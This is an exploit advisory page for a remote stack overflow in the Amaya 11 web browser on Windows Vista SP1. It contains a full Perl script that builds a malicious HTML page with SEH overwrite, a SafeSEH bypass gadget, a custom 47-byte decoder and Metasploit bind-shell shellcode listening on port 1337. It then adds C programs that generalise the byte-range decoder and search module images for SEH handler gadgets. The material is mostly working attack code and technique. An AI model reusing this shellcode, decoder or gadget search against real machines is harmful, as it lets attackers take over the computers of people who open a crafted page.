
Amaya Web Browser 11 Overflow For Vista

Posted Feb 4, 2009
Authored by Rob Carter

Amaya 11 remote stack overflow exploit for Windows Vista SP1. An over-long dir attribute on a bdo tag overwrites the SEH record on the stack; the handler address points at a pop/pop/push/pop/ret sequence in an Amaya module that is not SafeSEH-protected and loads at a constant base, and a 47-byte decoder built from bytes in the 0x01-0x7f range repairs the first 12 bytes of the alphanumeric Metasploit bind shell (port 1337) before it runs.

tags | exploit, remote, overflow
systems | windows
SHA-256 | e2a2d533c2ccd8fa575f2f8d933e131e2dc3f30b3543574bb3fb034ec5394986

#!/usr/bin/perl

#############################################
#
# Amaya 11 bdo tag stack overflow
#
# author: Rob Carter (cartrel@hotmail.com)
#
# targets: windows vista sp1
#
# modified the alpha-numeric shell-code
# from metasploit since the first 12 bytes
# didn't fall within the ASCII range of
# 0x01-0x7f. otherwise my payload would
# have been corrupted on the stack. wrote
# a 47-byte decoder to repair the shell-
# code to its original state.
#
# this exploit bypasses safeSEH by jumping
# to a pop pop push pop ret sequence in
# one of the amaya modules that has a
# constant base address in memory. ret's
# back to the stack, short jump over the
# overwritten SEH, decodes the first 12
# bytes of the shellcode and then runs
# the repaired shellcode to bind a shell
# on port 1337.
#
# $ perl amaya_sploit.pl > pwn.html
#
# the author is not responsible for any misuse of
# this code. it is intended for educational
# purposes only
#
#############################################

use strict;
use warnings;

# win32_bind - EXITFUNC=seh LPORT=1337 Size=709 Encoder=PexAlphaNum http://metasploit.com
# Every byte that reaches the stack through the bdo dir attribute has to be in
# 0x01-0x7f, so the 12 leading bytes of the encoder stub (which contain 0xeb,
# 0xe8 and 0xff) are replaced by in-range placeholders and repaired by $decoder.
my $shellcode =
# original first 12 bytes of shellcode:
# "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49".
"\x7f\x01\x01\x7f\x03\x68\x78\x70\x6f\x6f\x3d\x37".
"\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x48".
"\x4e\x46\x46\x42\x46\x42\x4b\x58\x45\x44\x4e\x33\x4b\x38\x4e\x47".
"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x41\x4b\x38".
"\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x53\x4b\x58".
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x55\x46\x32\x4a\x52\x45\x37\x45\x4e\x4b\x48".
"\x4f\x55\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54".
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x48".
"\x49\x48\x4e\x36\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d".
"\x46\x56\x4b\x48\x43\x54\x42\x53\x4b\x58\x42\x44\x4e\x30\x4b\x48".
"\x42\x37\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x30\x50\x45\x4a\x56".
"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x36".
"\x43\x35\x48\x36\x4a\x46\x43\x43\x44\x43\x4a\x46\x47\x37\x43\x47".
"\x44\x33\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x33\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e".
"\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x36\x44\x50".
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35".
"\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x45\x43\x35\x43\x55\x43\x54".
"\x43\x45\x43\x34\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x45\x30".
"\x49\x43\x48\x36\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x36\x46\x4a".
"\x4c\x51\x42\x57\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x41".
"\x41\x45\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x32".
"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x45\x45\x35\x4f\x4f\x42\x4d".
"\x4a\x36\x45\x4e\x49\x44\x48\x48\x49\x44\x47\x55\x4f\x4f\x48\x4d".
"\x42\x55\x46\x45\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x36".
"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x55".
"\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x46\x48\x56\x4a\x36\x43\x56".
"\x4d\x56\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x52\x4e\x4c".
"\x49\x48\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x53\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x34\x4e\x32".
"\x43\x49\x4d\x48\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56".
"\x44\x37\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x47\x46\x54\x4f\x4f".
"\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x35\x41\x35\x41\x45\x4c\x56".
"\x41\x50\x41\x45\x41\x55\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x56".
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x56".
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f".
"\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d".
"\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x45\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";

# 47-byte decoder. After the two pops ebx is the base for the adds below; the
# displacements 0x38/0x3c/0x40 hit the first three shellcode dwords when ebx
# points at nSEH: 4 (nSEH) + 4 (handler) + 47 (decoder) + 1 (pad) = 0x38.
# Every decoder byte (opcodes, displacements and immediates) is itself in 0x01-0x7f.
my $decoder =
"\x5b". # pop ebx
"\x5b". # pop ebx
"\x68\x6c\x02\x58\x6c". # push 0x6c58026c
"\x58". # pop eax
"\x01\x43\x38". # add dword ptr[ebx+38],eax ; 0x7f01017f + 0x6c58026c = 0xeb5903eb -> eb 03 59 eb
"\x68\x01\x01\x01\x10". # push 0x10010101
"\x58". # pop eax
"\x01\x43\x3c". # add dword ptr[ebx+3c],eax
"\x68\x01\x7f\x7f\x7f". # push 0x7f7f7f01
"\x58". # pop eax
"\x01\x43\x3c". # add dword ptr[ebx+3c],eax ; 0x70786803 + 0x10010101 + 0x7f7f7f01 = 0xfff8e805 -> 05 e8 f8 ff
"\x68\x11\x11\x01\x01". # push 0x01011111
"\x58". # pop eax
"\x01\x43\x40". # add dword ptr[ebx+40],eax
"\x68\x7f\x7f\x11\x11". # push 0x11117f7f
"\x58". # pop eax
"\x01\x43\x40"; # add dword ptr[ebx+40],eax ; 0x373d6f6f + 0x01011111 + 0x11117f7f = 0x494fffff -> ff ff 4f 49

my $payload =
"<bdo dir=\"".
"A" x 6905 .           # padding up to the SEH record
"\x74\x06\x41\x41".    # nSEH: je short +6, lands on the decoder (0x74 is in range; jmp short 0xeb is not)
"\x51\x55\x03\x10".    # handler = 0x10035551: pop - pop - push - pop - ret 0c in a fixed-base Amaya module (not SafeSEH); address bytes are all in range
$decoder.              # repairs the first 12 shellcode bytes in place
"A".                   # 1 byte of padding so the shellcode starts at nSEH+0x38
$shellcode.
"\">pwnd!</bdo>";

print $payload;
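The header above describes the byte-range problem in words. As an added example (not part of Rob Carter's exploit or of Metasploit), the C program below generalises the repair: it splits any dword whose bytes fall outside 0x01-0x7f into an in-range placeholder plus one or two in-range addends, emits the same 9-byte push/pop/add stub the exploit uses, and round-trips the exploit's own 12 original bytes to confirm the stub rebuilds them. The range limits, the [ebx+disp8] addressing and the assumption that the caller has already set up ebx (the exploit's two pops are not generated) are taken from the exploit; the encoding algorithm is mine.

```c
/* Added example: "repair with ADDs" for a shellcode prefix that contains bytes
 * outside [LO,HI]. Placeholder and decoder stub must both stay in range.
 * Assumed: ebx points at the base the caller chose (as the exploit's pop/pop does). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define LO 0x01
#define HI 0x7f
#define MAX_ADDS 2

static int byte_ok(int b) { return b >= LO && b <= HI; }
int bytes_ok(const uint8_t *p, size_t n) {            /* whole buffer in range? */
    for (size_t i = 0; i < n; i++) if (!byte_ok(p[i])) return 0;
    return 1;
}
static uint32_t le32(const uint8_t *p) {
    return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void put32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (v >> (8 * i)) & 0xff; }
static int dword_ok(uint32_t v) { uint8_t b[4]; put32(b, v); return bytes_ok(b, 4); }

/* target == placeholder + adds[0] (+ adds[1]) mod 2^32, every byte of every value in [LO,HI].
 * One addend can never carry, so it works iff each target byte is in [2*LO,2*HI] (true for the
 * exploit's first dword 0xeb5903eb); otherwise two addends with carry propagation handle any byte. */
int encode_dword(uint32_t target, uint32_t *placeholder, uint32_t adds[MAX_ADDS]) {
    uint32_t p = 0, a = 0, b = 0;
    int one = 1;
    for (int i = 0; i < 4; i++) {
        int t = (target >> (8 * i)) & 0xff;
        if (t < 2 * LO || t > 2 * HI) { one = 0; break; }
        int pi = (t - LO > HI) ? HI : t - LO;          /* greedy split into two in-range bytes */
        p |= (uint32_t)pi << (8 * i);
        a |= (uint32_t)(t - pi) << (8 * i);
    }
    if (one) { *placeholder = p; adds[0] = a; return 1; }
    p = a = 0;
    int carry = 0;
    for (int i = 0; i < 4; i++) {
        int s = (int)((target >> (8 * i)) & 0xff) - carry;  /* p_i + a_i + b_i must sum to this ... */
        carry = 0;
        if (s < 3 * LO) { s += 256; carry = 1; }            /* ... or to this plus a carry into byte i+1 */
        int pi = (s - 2 * LO > HI) ? HI : s - 2 * LO;
        int ai = (s - pi - LO > HI) ? HI : s - pi - LO;
        int bi = s - pi - ai;                                /* 3 <= s <= 0x102, so bi lands in [LO,HI] */
        p |= (uint32_t)pi << (8 * i); a |= (uint32_t)ai << (8 * i); b |= (uint32_t)bi << (8 * i);
    }
    *placeholder = p; adds[0] = a; adds[1] = b;
    return 2;
}

/* One dword's decoder stub, the exploit's 9-byte pattern per addend:
 *   68 imm32  push imm32 / 58  pop eax / 01 43 d8  add [ebx+d8], eax
 * The stub is in range whenever the addend and the displacement are. */
size_t emit_adds(const uint32_t *adds, int n, uint8_t disp, uint8_t *out) {
    size_t k = 0;
    for (int j = 0; j < n; j++) {
        out[k++] = 0x68; put32(out + k, adds[j]); k += 4;
        out[k++] = 0x58;
        out[k++] = 0x01; out[k++] = 0x43; out[k++] = disp;
    }
    return k;
}

/* Encode a prefix (len a multiple of 4) that lives at [ebx+base_disp]; returns decoder length. */
size_t encode_prefix(const uint8_t *orig, size_t len, uint8_t base_disp,
                     uint8_t *placeholder, uint8_t *decoder) {
    size_t k = 0;
    for (size_t off = 0; off < len; off += 4) {
        uint32_t p, adds[MAX_ADDS];
        int n = encode_dword(le32(orig + off), &p, adds);
        put32(placeholder + off, p);
        k += emit_adds(adds, n, (uint8_t)(base_disp + off), decoder + k);
    }
    return k;
}

/* Apply the stub's semantics to buf, which stands in for the bytes at [ebx+base_disp]. */
int run_decoder(const uint8_t *decoder, size_t dec_len, uint8_t base_disp, uint8_t *buf) {
    if (dec_len % 9) return 0;
    for (size_t k = 0; k < dec_len; k += 9) {
        if (decoder[k] != 0x68 || decoder[k + 5] != 0x58 || decoder[k + 6] != 0x01 || decoder[k + 7] != 0x43)
            return 0;
        size_t off = (uint8_t)(decoder[k + 8] - base_disp);
        put32(buf + off, le32(buf + off) + le32(decoder + k + 1));
    }
    return 1;
}

/* Round-trip one dword: number of addends used, or -1 if anything is out of range or wrong. */
int check_dword(uint32_t target) {
    uint32_t p, adds[MAX_ADDS], v;
    int n = encode_dword(target, &p, adds);
    if (!dword_ok(p)) return -1;
    v = p;
    for (int j = 0; j < n; j++) { if (!dword_ok(adds[j])) return -1; v += adds[j]; }
    return v == target ? n : -1;
}

/* The exploit's 12 original bytes at [ebx+0x38]: decoder length on a clean round trip, else -1. */
int prefix_selftest(void) {
    static const uint8_t orig[12] = {0xeb,0x03,0x59,0xeb,0x05,0xe8,0xf8,0xff,0xff,0xff,0x4f,0x49};
    uint8_t ph[12], dec[12 / 4 * MAX_ADDS * 9], buf[12];
    size_t n = encode_prefix(orig, 12, 0x38, ph, dec);
    memcpy(buf, ph, 12);
    if (!bytes_ok(ph, 12) || !bytes_ok(dec, n) || !run_decoder(dec, n, 0x38, buf)) return -1;
    return memcmp(buf, orig, 12) == 0 ? (int)n : -1;
}

int main(void) {
    printf("decoder bytes for the exploit prefix: %d (the exploit's 47 = these plus two pops)\n",
           prefix_selftest());
    return 0;
}
```

The first dword needs one addend and the other two need two, so the generated stub is 45 bytes, which is the exploit's 47 minus its two leading pops. The greedy byte split differs from the author's hand-picked constants but sums to the same values.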
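The SafeSEH bypass relies on a handler address with two properties the header only implies: it must point at a short push/pop run that leaves esp 8 bytes higher before a ret (so the ret lands on nSEH), and its own four bytes must be in 0x01-0x7f to survive the attribute, which 0x10035551 does. The scanner below is an added example, not the author's tool; it runs over a constructed 256-byte image at the constructed base 0x10035500 (not a real Amaya module) and filters candidates on both properties. Confirming that the module is really absent from the SafeSEH table and not relocated is a separate PE-header check not shown here.

```c
/* Added example: find SEH-handler gadget candidates in a module image.
 * Accepts push/pop runs with net esp delta +8 followed by ret / ret imm16
 * (pop/pop/ret, or the exploit's pop/pop/push/pop/ret 0c) and, optionally,
 * only addresses whose bytes are all in [LO,HI]. Sample image is constructed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define LO 0x01
#define HI 0x7f

static int is_pop(uint8_t b)  { return b >= 0x58 && b <= 0x5f && b != 0x5c; } /* pop r32, never pop esp */
static int is_push(uint8_t b) { return b >= 0x50 && b <= 0x57; }              /* push r32 */

static int addr_ok(uint32_t va) {                 /* every address byte must survive the attribute */
    for (int i = 0; i < 4; i++) { unsigned b = (va >> (8 * i)) & 0xff; if (b < LO || b > HI) return 0; }
    return 1;
}

/* Is img[off..] a run of push/pop with net esp delta +8, then ret or ret imm16? */
static int is_seh_gadget(const uint8_t *img, size_t len, size_t off, size_t *glen) {
    int delta = 0;
    size_t i = off;
    while (i < len && i - off < 6 && (is_pop(img[i]) || is_push(img[i]))) {
        delta += is_pop(img[i]) ? 4 : -4;
        i++;
    }
    if (i >= len || delta != 8) return 0;
    if (img[i] == 0xc3)                { *glen = i - off + 1; return 1; }  /* ret */
    if (img[i] == 0xc2 && i + 2 < len) { *glen = i - off + 3; return 1; }  /* ret imm16 */
    return 0;
}

size_t find_seh_gadgets(const uint8_t *img, size_t len, uint32_t base, int require_inrange,
                        uint32_t *out, size_t max) {
    size_t n = 0, glen;
    for (size_t off = 0; off < len && n < max; off++) {
        if (!is_seh_gadget(img, len, off, &glen)) continue;
        uint32_t va = base + (uint32_t)off;
        if (require_inrange && !addr_ok(va)) continue;
        out[n++] = va;
    }
    return n;
}

/* Constructed sample image (not a real Amaya module); base chosen so one gadget lands on 0x10035551. */
#define SAMPLE_BASE 0x10035500u
#define SAMPLE_LEN  0x100
void build_sample(uint8_t *img) {
    memset(img, 0x90, SAMPLE_LEN);
    memcpy(img + 0x10, "\x58\x59\xc3", 3);                 /* pop eax; pop ecx; ret -> 0x10035510, usable */
    memcpy(img + 0x20, "\x5c\x5b\xc3", 3);                 /* pop esp; pop ebx; ret -> clobbers esp, rejected */
    memcpy(img + 0x30, "\x58\xc3", 2);                     /* pop eax; ret -> only +4, rejected */
    memcpy(img + 0x51, "\x5b\x5d\x53\x5b\xc2\x0c\x00", 7); /* pop; pop; push; pop; ret 0c -> 0x10035551 */
    memcpy(img + 0x80, "\x58\x59\xc3", 3);                 /* pop/pop/ret at 0x10035580: the 0x80 byte would not survive */
}

size_t sample_count(int require_inrange) {
    uint8_t img[SAMPLE_LEN]; uint32_t out[16];
    build_sample(img);
    return find_seh_gadgets(img, SAMPLE_LEN, SAMPLE_BASE, require_inrange, out, 16);
}

int sample_has(uint32_t va) {                      /* is va among the in-range candidates? */
    uint8_t img[SAMPLE_LEN]; uint32_t out[16];
    build_sample(img);
    size_t n = find_seh_gadgets(img, SAMPLE_LEN, SAMPLE_BASE, 1, out, 16);
    for (size_t i = 0; i < n; i++) if (out[i] == va) return 1;
    return 0;
}

int main(void) {
    uint8_t img[SAMPLE_LEN]; uint32_t out[16];
    build_sample(img);
    size_t n = find_seh_gadgets(img, SAMPLE_LEN, SAMPLE_BASE, 1, out, 16);
    for (size_t i = 0; i < n; i++) printf("candidate handler: 0x%08x\n", out[i]);
    return 0;
}
```

On the sample image three sequences have the right stack shape, but only two have addresses whose bytes all fit the attribute's allowed range; the pop-esp sequence and the single-pop sequence are rejected outright.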

